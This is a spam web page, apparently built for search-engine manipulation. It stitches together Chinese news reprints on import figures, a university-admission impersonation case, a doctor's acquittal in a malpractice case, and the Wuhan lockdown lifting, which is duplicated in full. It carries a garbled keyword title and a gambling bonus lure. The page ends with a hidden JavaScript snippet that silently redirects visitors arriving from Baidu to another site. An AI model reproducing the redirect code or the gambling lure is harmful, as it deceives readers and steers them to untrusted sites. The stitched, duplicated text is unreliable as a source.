1. <form id='467640'></form>
        <bdo id='564292'><sup id='974543'><div id='917525'><bdo id='838587'></bdo></div></sup></bdo>

          • 来源:中国新闻网
          • 弱颜的全部小说修仙:医院seo:怎么做才能提升SEO关键词的质量

            时间:

            点击连接注册联系客服领取彩金 点击领取

            如何看待上月原油、大豆进口激增?商务部回应|||||||

            【如何看待上月原油、大豆进口激增?商务部回应】商务部新闻发言人高峰表示,5月我国原油、大豆进口规模增长,是中国企业根据国际市场变化和国内生产需要、按照市场化原则开展的进口。在当前世界经济下行压力不断加大的背景下,中国企业积极扩大进口,有助于提振世界经济发展信心。

            相关推荐 商务部等十部门:加大对不裁员或少裁员中小微家政企业财政支持 解读《海南自由贸易港建设总体方案》 商务部:正负面清单推进贸易自由便利化 荀建国 本文来源:第一财经 责任编辑:荀建国_NN7379

            山东冠县农家女被冒名顶替上大学 顶替者已被停职|||||||

            (原标题:山东冠县通报农家女被冒名顶替上大学:顶替者已被停职)

            新京报快讯 据冠县在线微信公众号消息,6月10日,媒体报道我县“农家女被冒名顶替上大学”一事,县委、县政府第一时间责成县纪委监委、县公安局、县教育和体育局成立联合调查组对此事开展调查,并与举报人见面,现将有关调查进展情况通报如下:

            顶替者陈某某,系我县某街道办事处工作人员,目前已被停职,事件涉及详细信息正在进一步调查中。县委、县政府将依据调查结果依法依纪依规严肃处理,最终结果会及时向社会公布。

            相关推荐 山东冠县就“农家女被冒名顶替上大学”一事开展调查 农家女被冒名顶替上大学:16年后顶替者被发现,学历将注销 2020-06-10 14:11:18 netease 本文来源:新京报 责任编辑:袁艺娇_NB14956

            李建雪医疗事故案:历时八年终于等来迟到的正义|||||||

            (原标题:“李建雪医疗事故罪”终审宣判,医生无罪!)

            历时8年的"李建雪医疗事故罪案"迎来终审。6月11日,福建省福州市中级人民法院对此案作出终审判决,宣判长乐市妇产科医生李建雪无罪!

            庭审当天上午,李建雪和爱人均请假来到法庭,等待当庭宣判。当拿到这个期盼多年的结果时,李建雪难掩激动。

            产妇死亡,医生被定罪

            2012年1月1日,产妇陈某在福建长乐市医院顺产7小时后死亡。次日,长乐市公安局以涉嫌"医疗事故罪"对此立案。福建省、福州市两级医学会在未对产妇进行尸检的情况下,认为医方对病情认识不足,抢救措施不力,与患者的死亡存在因果关系,该案件被认定为一级甲等医疗事故。

            2013年1月,李建雪被吊销医师执业资格,开除党籍。当年9月,长乐市公安局以犯罪嫌疑人李建雪等三人涉嫌医疗事故罪,向长乐市人民检察院移送起诉。2017年12月4日,福州市仓山区人民法院作出一审判决,判处李建雪犯医疗事故,免予刑事处罚。一审宣判后,李建雪不服,提出上诉。

            “如果有罪,我愿意接受法律的制裁,如果无罪,法律应该还我清白。”李建雪曾说。

            一审判决书显示,2011年12月28日下午,产妇陈某到长乐市医院妇产科办理分娩住院手续,入住该院妇产科三楼一号床,后离原回家待产。期间,该院妇产科医生吴某作为经管医生接诊,并为陈某进行了产前检查及开具检验单。

            次日上午吴某下班时,部分检验报告结论未出,吴某也未及时主动跟踪或者交代接班的医生查看,致陈某检验报告单上"红细胞压积43.8%、纤维蛋白原5.76g/L、白蛋白21.4g/L,尿蛋白+3"等检验异常结果至产前无值班医生查看了解。

            2011年12月31日,陈某返回该院待产,于当晚21时送入产房分娩,李建雪未查房了解陈某的病情。21时30分左右,陈某顺产一女婴后阴道出血不止,李建雪赶到产房进行处理,并通知二线值班医生王某到产房。

            陈某分娩过程中,王某发现陈某没有分娩前的化验检查报告,从电脑调出查看后发现检验结果异常,并嘱咐李建雪继续观察。

            2012年1月1日凌晨,李建雪赶到病房后发现陈某有生命危险,通知其他医生前来抢救,但未能挽回陈某的生命。公诉机关认为,李建雪在诊治过程中严重不负责任,根据《刑法》有关规定,应以医疗事故罪追究其刑事责任。

            此前,李建雪在一审时曾当庭辩称,自己在面对突发事件时经验不足,但在参与抢救和留在产房继续观察过程中,发现问题及时向上级医生汇报,始终按照上级医生的指示进行诊疗。

            2019年6月26日,此案迎来二审开庭。

            全国政协委员两会上疾呼:停止这起针对医生的刑罚

            或许医生经验不足,但不能因为患者去世就让医生成为"戴罪之身"。李建雪的辩护律师、北京市华卫律师事务所律师邓利强曾指出,李建雪的行为有疏失,但并不是不负责任,"李建雪有两次离开是去写病历。在她判断病人病情平稳时,也有打电话给医生前来查看情况,并不存在脱岗、未对产妇进行处理的情况。"邓利强认为,况且事后医方已经承担民事赔偿和行政处罚,并不应该被追究刑事责任。

            医院每天都有患者死亡,如果一旦有患者死亡就对医务人员立案侦查,岂非将每位医务人员的人身自由置于不确定的状态?此案审理过程中,多地组织召开卫生和法学界研讨会,有专家认为,轻易入罪将使医生每日工作“如履薄冰”。此外,是否构成医疗事故罪,要看患者人身损害的结果是否与医务人员严重不负责任的诊疗行为有必然的联系。邓利强在一审结束后用"莫大悲哀"形容自己心情。"如果每位患者死亡都要医生承担刑事责任的话,谁还愿意做医生?"

            全国政协委员温建民更是曾经在全国两会上呼吁"停止这起针对医生的刑罚"。此案庭审的专家证人、广州重症孕妇救治中心主任陈敦金也在安慰死者父亲的同时,认为"本起案件不应追溯医生的刑事责任"。

            据了解,2015的2月,长乐市医院已与产妇家属签订《民事和解协议书》,作出150万元的一次性赔偿。李建雪本人在一审结束后通过申请已经恢复医师执业资格,还在其原单位妇产科作为一名妇产科医生从事临床工作,目前已聘任主治医师职称。

            专家:医务人员应多关注“医疗事故罪”

            医疗事故罪的入罪门槛是中国所有医务工作者关注的焦点,如果仅仅为了安抚患者家属就给医生定罪,这显然有违法治精神。历时8年,这起引发全国关注的案件终于迎来医生无罪的判决。毫无疑问,案件终审结果对中国医疗界和法律界都将产生深远影响。

            北京大学医学人文学院副院长王岳曾参与过针对此案的研讨会。在看到判决结果后,王岳接受健康界采访时对案件提出五点看法。

            首先,医务人员应多关注“医疗事故罪”。这个罪名的诸多构成要件中,最重要也是最容易产生歧义的有两点:其一,医生行为是否“严重不负责任”,排除技术过错因素;其二,“严重不负责任的行为是否是患者死亡的原因,且能排除合理怀疑”。第二个认定显然更有难度,并且这里的因果关系应当是刑法学上的绝对因果关系。

            第二,尽管医疗行业曾建议取消医疗事故罪,但事实上,医疗事故罪并非我国独有,国外也有关于医疗犯罪的规定,例如美国是将其归入过失致人死亡罪名下。中国的刑法单独列出医疗事故罪名,恰恰是刑罚较轻的考量和处理方式。

            第三,“李建雪案”之所以受到社会特别是医疗行业关注,源于法院在事实认定和法律适用方面存在一定问题。在因果关系的认定上,医学会的鉴定是依据民事审判的因果关系认定,还是刑事审判的因果关系认定,是否已经排除了其他合理怀疑,并未在审判中充分论述清楚。

            第四,本案应当对存在死因争议的尸体进行尸检,这不同于民事案件,无需死者家属同意。虽然尸体冷冻时间很长,但是对于排除上述合理怀疑(例如羊水栓赛或呕吐物误吸窒息)是有意义的,没有进行尸检,就不能将不做尸检而影响事实认定之不利后果归于犯罪嫌疑人。

            第五,在医疗事故罪认定中,往往如本案会涉及组织性医疗人员的团队过错,以及院内管理方面的过错,这些都不宜认定为个人“严重不负责任”,这些组织因素应该被视为有效考量事由阻却刑事责任。

            相关推荐 再遇为自己挡刀的患者家属,陶勇医生笑了,网友却看哭了…… 被砍伤眼科医生陶勇:重回一线 感动多于恐惧 袁艺娇 本文来源:中国网医疗频道 作者:李子君 责任编辑:袁艺娇_NB14956

            1.4月8日零时,武汉"解封"现场的三个故事 |||||||

            (原标题:4月8日零时,武汉“解封”现场的三个故事)

            4月8日零点,武汉正式解除离汉通道管控,第一辆小客车驶出“武汉西”高速路口。澎湃新闻记者 孙湛 图

             “武汉西”三个醒目的红光大字,在漆黑的夜色背景下,极为耀眼。

            这是距武汉市中心30公里左右的京港澳高速“武汉西”收费站,也被称为武汉的西大门。

            被封禁了76天后,武汉的“解封”仪式就在这里举行。

            4月8日0点,湖北省交通厅厅长朱汉桥对着话筒宣布,“解封离汉高速通道,有序恢复对外交通”,在场工作人员挪开卡口栅栏,车辆鱼贯而出。

            这一刻,武汉和这个世界又联通了,很多人和这个世界也重新联通,流动开始了。

            出城人:“待太久了,觉也睡够了”

            距离4月8日零点还差2小时,王彩霞就驱车赶到了“武汉西”高速收费站。她算是第一辆车,随即被记者团团围住采访。

            王彩霞个头不高,身穿薄薄的紧身运动装,颇为干练。对着围成扇形的话筒和记者,她把自己的故事讲了一遍又一遍,一个又一个细节,全程笑着,没有任何厌烦。

            她说,行李早就收拾好装车了,就先过来看看,如果不能出去就打道回府。为何不等到白天时候再过来?“待太久了,觉也睡够了。”

            4月7日深夜,王彩霞在接受采访。澎湃新闻记者 孙湛 图

            王彩霞是湖北监理人,一直在海南工作。春节前两三个月,因为家人生病在武汉住院,她也临时租住在武汉。

            她注意到了医院里的人日渐增多,但在海南工作的她,猜想可能是因为湖北天气冷,看病的人比其他时间多。直到新闻上说了新冠肺炎“人传人”,然后接着武汉宣布“封城”,她才觉得情况“非常严重”。

            她本打算大年三十回家过年,但此前一天,武汉宣布了“封城”。

            她说,听到“封城”,有些失望,只能在武汉简单做一些菜过年,和家里人再通通视频,“尽量让我们不要出门,呆在家里。”

            但她需要去医院照顾生病的家人,“全副武装,心里都是吊着。”口罩是老早就被提醒要戴,防护服则是从超市买了雨衣来替代。

            王彩霞说,“封城”后最大的不变就是买菜。“因为病人需要新鲜食材,很多地方买不到。”因此,疫情期间她最大的感动,就是社区里开始给她们这些滞留人员送菜。

            她一度以为,武汉“不用关闭太久”,最后不料困居武汉两个多月。

            出城这一晚,她被记者围采了将近2个小时。通道栅栏被挪开那一刻,一辆黑色奥迪车反而第一个冲出城。车里男乘客很激动,举起手臂狂喊“武汉加油”。

            进城人:“进来还能出得去吗?”

            通道开启后,出城车辆络绎不绝,进城车辆寥寥无几。

            一辆日产轩逸缓缓停在了收费站进城口的岗亭边,收费站工作人员韦皓月摆手示意可直接通过。

            驾驶员是个中年男子,他打开车窗问,“进来还能出得去吗?”得到肯定的答案后,他才提速进入武汉。

            他叫付远军,从荆州江陵开了将近四个小时过来,是为了给一位叔叔到华中科技大学同济医学院附属同济医院取药,且必须于8日下午2点前送回。

            他的这位叔叔患肝癌,之前在同济医院做了手术,目前还在荆州某医院化疗,药物“都是进口的,只有武汉有。”

            来之前,他打听了进出武汉的各种政策和要求,也做好了准备:实在不行,就让堂弟把药送到高速口交接,他不进城。

            虽然也知道武汉4月8日解封的消息,但他还有些怀疑,“问一下工作人员安心。”。

            问及听到可以出城时的心情,他说“心情相当愉快、相当高兴,放下了顾虑、包袱。”

            遗憾的是,堂弟错过了拿药时间,只能等到8日白天再去取。付远军决定当晚睡在车里,“自己住车里安全,对别人也好、对自己也好,尽量不打扰别人。”

            他说,自己之前在江陵做志愿者,劝导居民少出门、不聚集、戴口罩,也一直关注着疫情。看到数字降为0,各个地方陆续解封,“我当然很高兴,我们湖北人很高兴,把疫情战胜了很高兴。”

            谈到任何感想,付远军都用“高兴”一词,至多“那是相当高兴”。他说自己不太会表达。

            电话采访临末,澎湃新闻记者和他道别并祝保重,他操着浓重的口音说,“你们也辛苦,把我们武汉、湖北的情况告诉全国。”

            守卡人:“免费不免服务”

            离汉通道开启的那一刻,韦皓月正坐在一个“武汉西”收费站的一个岗亭里。她返岗才一个星期。

            湖北省交通厅京港澳高速“武汉西”管理所一共79个人,平时实行轮班。

            1月19日,韦皓月上完班后回到襄阳家里,1月23日下午四点是她的上班时间。本来提前买好了火车票,但当天一早醒来,发现武汉封城、自己的火车票也自动被退了。

            “武汉西”管理所里像韦皓月这样因为武汉封城而被滞留在外地的人,大概有三分之一。还有一部分人则被留在了武汉城内,其余的人就住在了管理所的宿舍。为了安全,他们彼此也都禁止流动。

            留在管理所的工作人员要继续在收费站上班,“免费不免服务”,他们需要对收费站的各种设施消毒,在地上铺沙袋再喷84消毒液,便于清洁车辆轮胎;根据进出城的物资车辆、救援办公车辆的数量,调整开放车道的数量。有时候,还配合来此卡点检查的警察进行测温、登记信息等。

            至于滞留在家的收费站工作人员,单位发出号召,倡议他们到各自所在地从事志愿工作,比如工作人员程女士去了自己所在社区,帮忙测体温、送菜等。

            韦皓月也在襄阳老家做起了志愿工作,直到湖北其他地州通道全部开放后,她于4月1日返回“武汉西”收费站上班。

            4月8日凌晨,韦皓月坐在岗亭里,大部分时间注视着车辆流动,偶尔为咨询司机提供解答服务。

            此刻,出城的车辆在漆黑的夜色里,将高速点亮成一条明晃晃的长带,伸向远方。

            延伸阅读 解除湖北人员进京限制后 北京要求防止地域歧视 北京解除湖北进京限制 返京人员不再实行14天观察 中疾控副主任:武汉社区防控可恢复到疫情前状态 马小慧 本文来源:澎湃新闻 作者:彭渝 责任编辑:马小慧_NA3526

            2.4月8日零时,武汉"解封"现场的三个故事 |||||||

            (原标题:4月8日零时,武汉“解封”现场的三个故事)

            4月8日零点,武汉正式解除离汉通道管控,第一辆小客车驶出“武汉西”高速路口。澎湃新闻记者 孙湛 图

             “武汉西”三个醒目的红光大字,在漆黑的夜色背景下,极为耀眼。

            这是距武汉市中心30公里左右的京港澳高速“武汉西”收费站,也被称为武汉的西大门。

            被封禁了76天后,武汉的“解封”仪式就在这里举行。

            4月8日0点,湖北省交通厅厅长朱汉桥对着话筒宣布,“解封离汉高速通道,有序恢复对外交通”,在场工作人员挪开卡口栅栏,车辆鱼贯而出。

            这一刻,武汉和这个世界又联通了,很多人和这个世界也重新联通,流动开始了。

            出城人:“待太久了,觉也睡够了”

            距离4月8日零点还差2小时,王彩霞就驱车赶到了“武汉西”高速收费站。她算是第一辆车,随即被记者团团围住采访。

            王彩霞个头不高,身穿薄薄的紧身运动装,颇为干练。对着围成扇形的话筒和记者,她把自己的故事讲了一遍又一遍,一个又一个细节,全程笑着,没有任何厌烦。

            她说,行李早就收拾好装车了,就先过来看看,如果不能出去就打道回府。为何不等到白天时候再过来?“待太久了,觉也睡够了。”

            4月7日深夜,王彩霞在接受采访。澎湃新闻记者 孙湛 图

            王彩霞是湖北监理人,一直在海南工作。春节前两三个月,因为家人生病在武汉住院,她也临时租住在武汉。

            她注意到了医院里的人日渐增多,但在海南工作的她,猜想可能是因为湖北天气冷,看病的人比其他时间多。直到新闻上说了新冠肺炎“人传人”,然后接着武汉宣布“封城”,她才觉得情况“非常严重”。

            她本打算大年三十回家过年,但此前一天,武汉宣布了“封城”。

            她说,听到“封城”,有些失望,只能在武汉简单做一些菜过年,和家里人再通通视频,“尽量让我们不要出门,呆在家里。”

            但她需要去医院照顾生病的家人,“全副武装,心里都是吊着。”口罩是老早就被提醒要戴,防护服则是从超市买了雨衣来替代。

            王彩霞说,“封城”后最大的不变就是买菜。“因为病人需要新鲜食材,很多地方买不到。”因此,疫情期间她最大的感动,就是社区里开始给她们这些滞留人员送菜。

            她一度以为,武汉“不用关闭太久”,最后不料困居武汉两个多月。

            出城这一晚,她被记者围采了将近2个小时。通道栅栏被挪开那一刻,一辆黑色奥迪车反而第一个冲出城。车里男乘客很激动,举起手臂狂喊“武汉加油”。

            进城人:“进来还能出得去吗?”

            通道开启后,出城车辆络绎不绝,进城车辆寥寥无几。

            一辆日产轩逸缓缓停在了收费站进城口的岗亭边,收费站工作人员韦皓月摆手示意可直接通过。

            驾驶员是个中年男子,他打开车窗问,“进来还能出得去吗?”得到肯定的答案后,他才提速进入武汉。

            他叫付远军,从荆州江陵开了将近四个小时过来,是为了给一位叔叔到华中科技大学同济医学院附属同济医院取药,且必须于8日下午2点前送回。

            他的这位叔叔患肝癌,之前在同济医院做了手术,目前还在荆州某医院化疗,药物“都是进口的,只有武汉有。”

            来之前,他打听了进出武汉的各种政策和要求,也做好了准备:实在不行,就让堂弟把药送到高速口交接,他不进城。

            虽然也知道武汉4月8日解封的消息,但他还有些怀疑,“问一下工作人员安心。”。

            问及听到可以出城时的心情,他说“心情相当愉快、相当高兴,放下了顾虑、包袱。”

            遗憾的是,堂弟错过了拿药时间,只能等到8日白天再去取。付远军决定当晚睡在车里,“自己住车里安全,对别人也好、对自己也好,尽量不打扰别人。”

            他说,自己之前在江陵做志愿者,劝导居民少出门、不聚集、戴口罩,也一直关注着疫情。看到数字降为0,各个地方陆续解封,“我当然很高兴,我们湖北人很高兴,把疫情战胜了很高兴。”

            谈到任何感想,付远军都用“高兴”一词,至多“那是相当高兴”。他说自己不太会表达。

            电话采访临末,澎湃新闻记者和他道别并祝保重,他操着浓重的口音说,“你们也辛苦,把我们武汉、湖北的情况告诉全国。”

            守卡人:“免费不免服务”

            离汉通道开启的那一刻,韦皓月正坐在一个“武汉西”收费站的一个岗亭里。她返岗才一个星期。

            湖北省交通厅京港澳高速“武汉西”管理所一共79个人,平时实行轮班。

            1月19日,韦皓月上完班后回到襄阳家里,1月23日下午四点是她的上班时间。本来提前买好了火车票,但当天一早醒来,发现武汉封城、自己的火车票也自动被退了。

            “武汉西”管理所里像韦皓月这样因为武汉封城而被滞留在外地的人,大概有三分之一。还有一部分人则被留在了武汉城内,其余的人就住在了管理所的宿舍。为了安全,他们彼此也都禁止流动。

            留在管理所的工作人员要继续在收费站上班,“免费不免服务”,他们需要对收费站的各种设施消毒,在地上铺沙袋再喷84消毒液,便于清洁车辆轮胎;根据进出城的物资车辆、救援办公车辆的数量,调整开放车道的数量。有时候,还配合来此卡点检查的警察进行测温、登记信息等。

            至于滞留在家的收费站工作人员,单位发出号召,倡议他们到各自所在地从事志愿工作,比如工作人员程女士去了自己所在社区,帮忙测体温、送菜等。

            韦皓月也在襄阳老家做起了志愿工作,直到湖北其他地州通道全部开放后,她于4月1日返回“武汉西”收费站上班。

            4月8日凌晨,韦皓月坐在岗亭里,大部分时间注视着车辆流动,偶尔为咨询司机提供解答服务。

            此刻,出城的车辆在漆黑的夜色里,将高速点亮成一条明晃晃的长带,伸向远方。

            延伸阅读 解除湖北人员进京限制后 北京要求防止地域歧视 北京解除湖北进京限制 返京人员不再实行14天观察 中疾控副主任:武汉社区防控可恢复到疫情前状态 马小慧 本文来源:澎湃新闻 作者:彭渝 责任编辑:马小慧_NA3526

            最新文章

            热门文章

            友情链接:   520笔趣阁  |  35书屋  |  Eleven
            type="text/javascript"> var regexp=/\.(baidu)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href="http://www.3535001.com/" }